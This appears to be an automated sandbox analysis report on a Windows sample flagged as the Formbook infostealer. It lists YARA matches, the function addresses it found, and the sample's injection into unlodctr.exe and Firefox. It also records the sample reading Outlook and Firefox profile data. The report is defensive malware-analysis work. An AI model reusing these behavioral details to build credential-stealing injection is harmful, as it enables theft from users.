Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03040100 8_2_03040100
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030EA118 8_2_030EA118
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030D8158 8_2_030D8158
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_031041A2 8_2_031041A2
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_031101AA 8_2_031101AA
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_031081CC 8_2_031081CC
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030E2000 8_2_030E2000
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03074750 8_2_03074750
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03050770 8_2_03050770
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0304C7C0 8_2_0304C7C0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0306C6E0 8_2_0306C6E0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03050535 8_2_03050535
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03110591 8_2_03110591
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030F4420 8_2_030F4420
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03102446 8_2_03102446
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030FE4F6 8_2_030FE4F6
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0310AB40 8_2_0310AB40
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03106BD7 8_2_03106BD7
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0304EA80 8_2_0304EA80
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03066962 8_2_03066962
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030529A0 8_2_030529A0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0311A9A6 8_2_0311A9A6
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03052840 8_2_03052840
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0305A840 8_2_0305A840
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030368B8 8_2_030368B8
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0307E8F0 8_2_0307E8F0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03092F28 8_2_03092F28
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03070F30 8_2_03070F30
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030F2F30 8_2_030F2F30
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030C4F40 8_2_030C4F40
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030CEFA0 8_2_030CEFA0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03042FC8 8_2_03042FC8
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0305CFE0 8_2_0305CFE0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0310EE26 8_2_0310EE26
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03050E59 8_2_03050E59
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0310CE93 8_2_0310CE93
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03062E90 8_2_03062E90
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0310EEDB 8_2_0310EEDB
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0305AD00 8_2_0305AD00
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030ECD1F 8_2_030ECD1F
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03068DBF 8_2_03068DBF
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0304ADE0 8_2_0304ADE0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03050C00 8_2_03050C00
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030F0CB5 8_2_030F0CB5
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03040CF2 8_2_03040CF2
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0310132D 8_2_0310132D
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0303D34C 8_2_0303D34C
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0309739A 8_2_0309739A
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030552A0 8_2_030552A0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0306B2C0 8_2_0306B2C0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030F12ED 8_2_030F12ED
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0308516C 8_2_0308516C
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0303F172 8_2_0303F172
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0311B16B 8_2_0311B16B
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0305B1B0 8_2_0305B1B0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030FF0CC 8_2_030FF0CC
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030570C0 8_2_030570C0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0310F0E0 8_2_0310F0E0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_031070E9 8_2_031070E9
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0310F7B0 8_2_0310F7B0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03095630 8_2_03095630
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_031016CC 8_2_031016CC
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03107571 8_2_03107571
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030ED5B0 8_2_030ED5B0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_031195C3 8_2_031195C3
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0310F43F 8_2_0310F43F
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03041460 8_2_03041460
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0310FB76 8_2_0310FB76
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0306FB80 8_2_0306FB80
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0308DBF9 8_2_0308DBF9
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030C5BF0 8_2_030C5BF0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03107A46 8_2_03107A46
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0310FA49 8_2_0310FA49
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030C3A6C 8_2_030C3A6C
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030EDAAC 8_2_030EDAAC
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03095AA0 8_2_03095AA0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030F1AA3 8_2_030F1AA3
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030FDAC6 8_2_030FDAC6
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030E5910 8_2_030E5910
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03059950 8_2_03059950
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0306B950 8_2_0306B950
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030BD800 8_2_030BD800
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030538E0 8_2_030538E0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0310FF09 8_2_0310FF09
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03051F92 8_2_03051F92
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0310FFB1 8_2_0310FFB1
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03013FD2 8_2_03013FD2
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03013FD5 8_2_03013FD5
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03059EB0 8_2_03059EB0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03053D40 8_2_03053D40
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03101D5A 8_2_03101D5A
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03107D73 8_2_03107D73
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0306FDC0 8_2_0306FDC0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030C9C32 8_2_030C9C32
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0310FCF2 8_2_0310FCF2
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_00361280 8_2_00361280
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0035C450 8_2_0035C450
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0035C447 8_2_0035C447
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0035C670 8_2_0035C670
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0035A6F0 8_2_0035A6F0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_00362DF0 8_2_00362DF0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_00379D70 8_2_00379D70
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\file.exe Code function: String function: 01A15130 appears 58 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 01A5F290 appears 105 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 01A4EA12 appears 86 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 01A27E54 appears 102 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 019CB970 appears 280 times
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: String function: 030BEA12 appears 86 times
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: String function: 03097E54 appears 111 times
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: String function: 0303B970 appears 280 times
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: String function: 030CF290 appears 105 times
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: String function: 03085130 appears 58 times
PE / OLE file has an invalid certificate
Source: file.exe Static PE information: invalid certificate
Sample file is different than original file name gathered from version info
Source: file.exe, 00000000.00000002.2314807218.0000000000EBE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe, 00000000.00000002.2318845405.0000000005750000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameSimpleLogin.dllD vs file.exe
Source: file.exe, 00000000.00000002.2315834889.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs file.exe
Source: file.exe, 00000000.00000002.2315834889.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSimpleLogin.dllD vs file.exe
Source: file.exe, 00000000.00000002.2316360086.0000000003F2D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs file.exe
Source: file.exe, 00000000.00000002.2319858454.00000000073F0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs file.exe
Source: file.exe, 00000004.00000002.2845166430.0000000001ACD000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs file.exe
Source: file.exe, 00000004.00000002.2844123064.0000000001477000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNLODCTR.EXEj% vs file.exe
Source: file.exe Binary or memory string: OriginalFilenameuQDZ.exeX vs file.exe
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 4.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 4.2.file.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.2844593434.00000000018C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.2843507028.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.3513763448.0000000000850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.3513480286.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.3513697990.0000000000810000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.3514140722.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.3514995651.0000000002F10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.2851724313.0000000001DF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.file.exe.2c49a04.4.raw.unpack, XG.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.file.exe.2c49a04.4.raw.unpack, XG.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.file.exe.7060000.9.raw.unpack, XG.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.file.exe.7060000.9.raw.unpack, XG.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.file.exe.2c38d8c.3.raw.unpack, XG.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.file.exe.2c38d8c.3.raw.unpack, XG.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.file.exe.3fe35c8.6.raw.unpack, ijXhqSg1KPhojxnTQi.cs Security API names: _0020.SetAccessControl
Source: 0.2.file.exe.3fe35c8.6.raw.unpack, ijXhqSg1KPhojxnTQi.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.file.exe.3fe35c8.6.raw.unpack, ijXhqSg1KPhojxnTQi.cs Security API names: _0020.AddAccessRule
Source: 0.2.file.exe.3fe35c8.6.raw.unpack, I2uc7WT7LwxsvBMWY7.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.file.exe.73f0000.10.raw.unpack, ijXhqSg1KPhojxnTQi.cs Security API names: _0020.SetAccessControl
Source: 0.2.file.exe.73f0000.10.raw.unpack, ijXhqSg1KPhojxnTQi.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.file.exe.73f0000.10.raw.unpack, ijXhqSg1KPhojxnTQi.cs Security API names: _0020.AddAccessRule
Source: 0.2.file.exe.73f0000.10.raw.unpack, I2uc7WT7LwxsvBMWY7.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.file.exe.2c38d8c.3.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
Source: 0.2.file.exe.7060000.9.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
Source: 0.2.file.exe.2c49a04.4.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@9/1@4/4
Source: C:\Users\user\Desktop\file.exe Mutant created: NULL
Source: C:\Users\user\Desktop\file.exe Mutant created: \Sessions\1\BaseNamedObjects\FztGqmkrzPKOxqz
Source: C:\Windows\SysWOW64\unlodctr.exe File created: C:\Users\user\AppData\Local\Temp\17-EIW25 Jump to behavior
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: file.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unlodctr.exe, 00000008.00000002.3513851473.000000000092A000.00000004.00000020.00020000.00000000.sdmp, unlodctr.exe, 00000008.00000002.3513851473.000000000095E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe ReversingLabs: Detection: 47%
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe Process created: C:\Windows\SysWOW64\unlodctr.exe "C:\Windows\SysWOW64\unlodctr.exe"
Source: C:\Windows\SysWOW64\unlodctr.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe" Jump to behavior
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe Process created: C:\Windows\SysWOW64\unlodctr.exe "C:\Windows\SysWOW64\unlodctr.exe" Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: loadperf.dll Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: file.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: unlodctr.pdbGCTL source: file.exe, 00000004.00000002.2844123064.0000000001477000.00000004.00000020.00020000.00000000.sdmp, LHmmkoXQgKLVlTwFJILFF.exe, 00000007.00000002.3514082611.0000000001178000.00000004.00000020.00020000.00000000.sdmp
